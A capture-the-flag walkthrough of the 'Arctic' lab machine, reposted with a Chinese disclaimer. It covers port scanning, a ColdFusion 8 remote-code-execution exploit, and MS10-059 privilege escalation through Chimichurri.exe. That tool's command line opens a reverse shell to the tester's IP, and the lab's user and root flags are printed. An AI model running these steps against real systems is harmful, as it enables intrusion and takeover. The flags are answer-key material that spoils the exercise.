Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.11 | TCP:135,8500,49154 |
$ ip='10.10.10.11'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Adobe ColdFusion 8 RCE
![[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图](https://img.4awl.net/img/56/886db63984d76418e0d464ffb21441.jpg "[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图")
http://10.10.10.11:8500/CFIDE/administrator/
![[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图1](https://img.4awl.net/img/b3/b9c16cd3704fce9ba1a4ef839a2567.jpg "[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图1")
https://www.exploit-db.com/exploits/50057
![[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图2](https://img.4awl.net/img/9f/8bef49e04836ef6350b18dc5207ba5.jpg "[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图2")
![[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图3](https://img.4awl.net/img/3e/5d4d975c25e56b07e95c892ba44128.jpg "[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图3")
User.txt
28cec91860c0151792d28e1e925165d5
Privilege Escalation:MS10-059 Tracing Feature for Services Could
X:\\> systeminfo > systeminfo.txt
$ python2 windows-exploit-suggester.py --update
$ python2 windows-exploit-suggester.py --database 2025-02-26-mssb.xls --systeminfo systeminfo.txt
![[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图4](https://img.4awl.net/img/16/5281967afa7fab8301b9099428fc6b.jpg "[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图4")
https://github.com/egre55/windows-kernel-exploits/blob/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
X:\\> .\Chimichurri.exe
X:\\> .\Chimichurri.exe 10.10.16.33 10032
![[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图5](https://img.4awl.net/img/93/4d5894cb9bc1586fd758fffea5a84c.jpg "[Meachines] [Easy] Arctic Adobe ColdFusion 8 RCE+MS10-059 Tracing Feature f…插图5")
Root.txt
ffae96561e8c4f1ee1c56e7be7c752d9
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
